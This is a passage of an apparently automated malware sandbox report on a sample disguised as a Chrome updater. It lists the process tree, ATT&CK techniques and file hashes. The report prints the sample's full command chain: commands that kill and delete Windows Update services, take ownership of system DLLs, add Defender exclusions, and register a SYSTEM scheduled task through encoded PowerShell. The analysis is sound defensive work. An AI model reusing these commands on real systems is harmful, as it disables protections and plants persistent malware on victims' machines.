- Suspicious use of WriteProcessMemory
PID:4252

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:3768

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:4860

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:5056

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:2732

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1896

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1932

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4788

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:2200

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:3876

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:60

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4040

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4480

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4520

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4544

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1784

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:3188

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:2956

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4640

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1576

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1884

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2612

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:4884

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4256

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4208

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdwBtAG0AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABFAEEAWQBnAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAFEAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBvAGoAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAGkAZwBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB4AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAA1ADgAZQA4ADAAMQBkAGYAZABhAGEANwA1AGUAZgA5ADcANwBmAGUAYQAwADEAYQAyADAAMABmADkAMABlADcAMgAwADIANAAwADYAOAAzADMAYQAxAGUAMgBjADAANgBlAGIAZQAxADUAYQA5ADkAYQA3ADIAYwAzADgAOQA1AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAeABqAGQAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAbABvACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1532

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2308

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4220

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:2940

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4808

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:4912

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:3196

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:3736

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:3460

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:4564

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:4452

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:4536

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1536

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1596

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3188

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1928

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:4308

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:4608

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:3828

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:4888

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:4664

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1632

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2644

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1848

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1880

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:532

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:1932

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:4348

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:1488

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:1644

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "bmkeytcye"
4⤵
PID:4628

C:\Windows\explorer.exe
C:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr56
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3112

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d40967c47cf326de693576ebae1d8522

SHA1
7d1b6f9e84fb5d3d933496acc7e568f0e321920f

SHA256
ef5b2454edae5f5327531699e2815257ae55aa7f008c3067bd4127865bb932f9

SHA512
b28c4fab919d81bc6966796a423499aeb0526a38f88c9437958b1b8de930be542aaee1e654716d5ed8803416bc2f252d094a374db1952f2285de2f112f6219d7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e2d46bffd1d9300639cac360fac02cb4

SHA1
fd2b4813c8ab610294b6759192ca05bad5bb8958

SHA256
94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3

SHA512
54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
c5227366b7a688ff23b01788718251aa

SHA1
9795262e79c832ba49c744fcd1b1794c0ffb5c6a

SHA256
789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

SHA512
8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

Download Submit
memory/60-190-0x0000000000000000-mapping.dmp

Download
memory/532-423-0x0000000000000000-mapping.dmp

Download
memory/544-122-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmp

Filesize
1.9MB

Download
memory/544-121-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/544-118-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/544-120-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmp

Filesize
1.9MB

Download
memory/544-119-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/680-127-0x000001217CF70000-0x000001217D38E000-memory.dmp

Filesize
4.1MB

Download
memory/680-130-0x0000012179F50000-0x000001217A36E000-memory.dmp

Filesize
4.1MB

Download
memory/1196-143-0x0000021A6B0E0000-0x0000021A6B156000-memory.dmp

Filesize
472KB

Download
memory/1196-140-0x0000021A52A90000-0x0000021A52AB2000-memory.dmp

Filesize
136KB

Download
memory/1196-135-0x0000000000000000-mapping.dmp

Download
memory/1488-431-0x0000000000000000-mapping.dmp

Download
memory/1536-448-0x0000000000000000-mapping.dmp

Download
memory/1576-231-0x0000000000000000-mapping.dmp

Download
memory/1596-449-0x0000000000000000-mapping.dmp

Download
memory/1632-462-0x0000000000000000-mapping.dmp

Download
memory/1644-191-0x0000000000000000-mapping.dmp

Download
memory/1644-433-0x0000000000000000-mapping.dmp

Download
memory/1784-223-0x0000000000000000-mapping.dmp

Download
memory/1848-460-0x0000000000000000-mapping.dmp

Download
memory/1880-459-0x0000000000000000-mapping.dmp

Download
memory/1884-232-0x0000000000000000-mapping.dmp

Download
memory/1896-185-0x0000000000000000-mapping.dmp

Download
memory/1928-468-0x0000000000000000-mapping.dmp

Download
memory/1932-186-0x0000000000000000-mapping.dmp

Download
memory/1932-427-0x0000000000000000-mapping.dmp

Download
memory/1984-458-0x0000000000000000-mapping.dmp

Download
memory/2200-188-0x0000000000000000-mapping.dmp

Download
memory/2308-264-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmp

Filesize
1.9MB

Download
memory/2308-258-0x0000000000000000-mapping.dmp

Download
memory/2308-261-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/2308-262-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmp

Filesize
1.9MB

Download
memory/2308-263-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/2600-428-0x000001E6EE800000-0x000001E6EE806000-memory.dmp

Filesize
24KB

Download
memory/2600-437-0x000001E6EE830000-0x000001E6EE842000-memory.dmp

Filesize
72KB

Download
memory/2612-233-0x0000000000000000-mapping.dmp

Download
memory/2644-461-0x0000000000000000-mapping.dmp

Download
memory/2732-184-0x0000000000000000-mapping.dmp

Download
memory/2940-425-0x0000000000000000-mapping.dmp

Download
memory/2956-227-0x0000000000000000-mapping.dmp

Download
memory/3112-451-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3112-456-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3112-457-0x00000000010F0000-0x0000000001110000-memory.dmp

Filesize
128KB

Download
memory/3112-454-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3112-452-0x000000014036EAC4-mapping.dmp

Download
memory/3112-470-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3112-469-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3180-192-0x0000000000000000-mapping.dmp

Download
memory/3188-224-0x0000000000000000-mapping.dmp

Download
memory/3188-450-0x0000000000000000-mapping.dmp

Download
memory/3196-432-0x0000000000000000-mapping.dmp

Download
memory/3460-435-0x0000000000000000-mapping.dmp

Download
memory/3736-434-0x0000000000000000-mapping.dmp

Download
memory/3768-177-0x0000000000000000-mapping.dmp

Download
memory/3828-465-0x0000000000000000-mapping.dmp

Download
memory/3876-189-0x0000000000000000-mapping.dmp

Download
memory/4040-193-0x0000000000000000-mapping.dmp

Download
memory/4192-183-0x0000000000000000-mapping.dmp

Download
memory/4208-182-0x0000000000000000-mapping.dmp

Download
memory/4220-422-0x0000000000000000-mapping.dmp

Download
memory/4252-175-0x0000000000000000-mapping.dmp

Download
memory/4256-180-0x0000000000000000-mapping.dmp

Download
memory/4308-467-0x0000000000000000-mapping.dmp

Download
memory/4348-430-0x0000000000000000-mapping.dmp

Download
memory/4452-438-0x0000000000000000-mapping.dmp

Download
memory/4480-220-0x0000000000000000-mapping.dmp

Download
memory/4520-221-0x0000000000000000-mapping.dmp

Download
memory/4536-446-0x0000000000000000-mapping.dmp

Download
memory/4544-222-0x0000000000000000-mapping.dmp

Download
memory/4564-436-0x0000000000000000-mapping.dmp

Download
memory/4608-466-0x0000000000000000-mapping.dmp

Download
memory/4628-453-0x0000012E92460000-0x0000012E92467000-memory.dmp

Filesize
28KB

Download
memory/4628-444-0x0000012E92B80000-0x0000012E92B86000-memory.dmp

Filesize
24KB

Download
memory/4640-230-0x0000000000000000-mapping.dmp

Download
memory/4664-237-0x0000000000000000-mapping.dmp

Download
memory/4664-463-0x0000000000000000-mapping.dmp

Download
memory/4788-187-0x0000000000000000-mapping.dmp

Download
memory/4808-426-0x0000000000000000-mapping.dmp

Download
memory/4832-178-0x0000000000000000-mapping.dmp

Download
memory/4860-179-0x0000000000000000-mapping.dmp

Download
memory/4884-176-0x0000000000000000-mapping.dmp

Download
memory/4888-464-0x0000000000000000-mapping.dmp

Download
memory/4912-429-0x0000000000000000-mapping.dmp

Download
memory/5016-275-0x0000000000000000-mapping.dmp

Download
memory/5016-331-0x00000210471D0000-0x00000210471DA000-memory.dmp

Filesize
40KB

Download
memory/5016-298-0x0000021047360000-0x0000021047419000-memory.dmp

Filesize
740KB

Download
memory/5016-292-0x00000210471B0000-0x00000210471CC000-memory.dmp

Filesize
112KB

Download
memory/5056-181-0x0000000000000000-mapping.dmp

Download